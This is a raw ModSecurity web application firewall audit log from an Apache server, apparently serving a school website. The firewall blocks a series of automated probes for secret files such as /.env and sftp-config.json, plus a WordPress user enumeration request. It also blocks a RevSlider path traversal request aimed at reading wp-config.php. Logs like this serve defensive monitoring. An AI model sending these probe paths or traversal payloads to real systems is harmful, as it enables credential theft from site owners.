CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7b5c77c-Z-- --9d7a3374-A-- [27/Apr/2025:22:48:26 +0700] aA5RyiKLpK55oNIcEw1xjAAAAFg 103.236.140.4 38142 103.236.140.4 8181 --9d7a3374-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.38.23.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.38.23.15 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --9d7a3374-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d7a3374-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745768906691250 1016 (- - -) Stopwatch2: 1745768906691250 1016; combined=318, p1=277, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d7a3374-Z-- --4af9665d-A-- [27/Apr/2025:23:47:22 +0700] aA5fmv7FMV4FIoAOnu49VgAAAAo 103.236.140.4 56690 103.236.140.4 8181 --4af9665d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.211.110.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.211.110.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4af9665d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4af9665d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745772442938515 714 (- - -) Stopwatch2: 1745772442938515 714; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4af9665d-Z-- --717ff17c-A-- [28/Apr/2025:02:11:48 +0700] aA6BdCKLpK55oNIcEw1-UgAAAEo 103.236.140.4 38858 103.236.140.4 8181 --717ff17c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42 Accept-Charset: utf-8 --717ff17c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --717ff17c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745781108132392 926 (- - -) Stopwatch2: 1745781108132392 926; combined=370, p1=316, p2=0, p3=0, p4=0, p5=54, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --717ff17c-Z-- --ce28326a-A-- [28/Apr/2025:03:56:22 +0700] aA6Z9mj1i6BJZll4jGOnewAAAIc 103.236.140.4 40514 103.236.140.4 8181 --ce28326a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.196.84 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.196.84 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --ce28326a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce28326a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745787382245446 1090 (- - -) Stopwatch2: 1745787382245446 1090; combined=507, p1=468, p2=0, p3=0, p4=0, p5=39, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce28326a-Z-- --b4f8bf12-A-- [28/Apr/2025:06:00:54 +0700] aA63Jmj1i6BJZll4jGOt1wAAAIc 103.236.140.4 41178 103.236.140.4 8181 --b4f8bf12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 194.163.159.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 194.163.159.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36 Accept-Charset: utf-8 --b4f8bf12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4f8bf12-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745794854965512 748 (- - -) Stopwatch2: 1745794854965512 748; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4f8bf12-Z-- --f1ca5a28-A-- [28/Apr/2025:07:33:47 +0700] aA7M64_5LpLtj_OTfS_UqgAAAM4 103.236.140.4 34426 103.236.140.4 8181 --f1ca5a28-B-- GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f1ca5a28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1ca5a28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800427536361 1034 (- - -) Stopwatch2: 1745800427536361 1034; combined=389, p1=350, p2=0, p3=0, p4=0, p5=38, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1ca5a28-Z-- --47255d5b-A-- [28/Apr/2025:07:33:48 +0700] aA7M7FT4soy9XydcuKajggAAAFI 103.236.140.4 34428 103.236.140.4 8181 --47255d5b-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --47255d5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47255d5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800428242237 959 (- - -) Stopwatch2: 1745800428242237 959; combined=371, p1=332, p2=0, p3=0, p4=0, p5=39, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47255d5b-Z-- --a84b0771-A-- [28/Apr/2025:07:33:48 +0700] aA7M7I_5LpLtj_OTfS_UrAAAANY 103.236.140.4 34434 103.236.140.4 8181 --a84b0771-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a84b0771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a84b0771-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800428698742 759 (- - -) Stopwatch2: 1745800428698742 759; combined=340, p1=297, p2=0, p3=0, p4=0, p5=43, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a84b0771-Z-- --8cb03a3f-A-- [28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajgwAAAFE 103.236.140.4 34436 103.236.140.4 8181 --8cb03a3f-B-- GET /laravel/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --8cb03a3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cb03a3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800429043082 766 (- - -) Stopwatch2: 1745800429043082 766; combined=332, p1=298, p2=0, p3=0, p4=0, p5=34, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cb03a3f-Z-- --c297c15c-A-- [28/Apr/2025:07:33:49 +0700] aA7M7VT4soy9XydcuKajhAAAAFA 103.236.140.4 34438 103.236.140.4 8181 --c297c15c-B-- GET /test/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --c297c15c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c297c15c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800429391431 665 (- - -) Stopwatch2: 1745800429391431 665; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c297c15c-Z-- --487c4347-A-- [28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhQAAAFQ 103.236.140.4 34444 103.236.140.4 8181 --487c4347-B-- GET /admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --487c4347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --487c4347-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800430173044 807 (- - -) Stopwatch2: 1745800430173044 807; combined=314, p1=278, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --487c4347-Z-- --12e11c66-A-- [28/Apr/2025:07:33:50 +0700] aA7M7lT4soy9XydcuKajhgAAAFY 103.236.140.4 34450 103.236.140.4 8181 --12e11c66-B-- GET /vendor/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --12e11c66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12e11c66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800430625648 790 (- - -) Stopwatch2: 1745800430625648 790; combined=288, p1=239, p2=0, p3=0, p4=0, p5=49, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12e11c66-Z-- --5e13b578-A-- [28/Apr/2025:07:33:51 +0700] aA7M74_5LpLtj_OTfS_UrwAAAME 103.236.140.4 34452 103.236.140.4 8181 --5e13b578-B-- GET /sites/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5e13b578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e13b578-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800431377582 821 (- - -) Stopwatch2: 1745800431377582 821; combined=311, p1=275, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e13b578-Z-- --7bbf3e03-A-- [28/Apr/2025:07:33:51 +0700] aA7M78JruAEpaSEZ7DC71gAAAAc 103.236.140.4 34458 103.236.140.4 8181 --7bbf3e03-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --7bbf3e03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbf3e03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800431723300 832 (- - -) Stopwatch2: 1745800431723300 832; combined=317, p1=281, p2=0, p3=0, p4=0, p5=35, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbf3e03-Z-- --1e0a217a-A-- [28/Apr/2025:07:33:52 +0700] aA7M8MJruAEpaSEZ7DC71wAAAAY 103.236.140.4 34460 103.236.140.4 8181 --1e0a217a-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1e0a217a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e0a217a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432069700 737 (- - -) Stopwatch2: 1745800432069700 737; combined=302, p1=271, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e0a217a-Z-- --9469217c-A-- [28/Apr/2025:07:33:52 +0700] aA7M8I_5LpLtj_OTfS_UsAAAAMA 103.236.140.4 34462 103.236.140.4 8181 --9469217c-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --9469217c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9469217c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432414692 702 (- - -) Stopwatch2: 1745800432414692 702; combined=280, p1=247, p2=0, p3=0, p4=0, p5=33, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9469217c-Z-- --5193e92c-A-- [28/Apr/2025:07:33:52 +0700] aA7M8FT4soy9XydcuKajiAAAAEA 103.236.140.4 34468 103.236.140.4 8181 --5193e92c-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5193e92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5193e92c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745800432918571 837 (- - -) Stopwatch2: 1745800432918571 837; combined=320, p1=284, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5193e92c-Z-- --e0164e44-A-- [28/Apr/2025:07:45:13 +0700] aA7PmVT4soy9XydcuKaj_AAAAEY 103.236.140.4 37064 103.236.140.4 8181 --e0164e44-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e0164e44-F-- HTTP/1.1 403 Forbidden Content-Length: 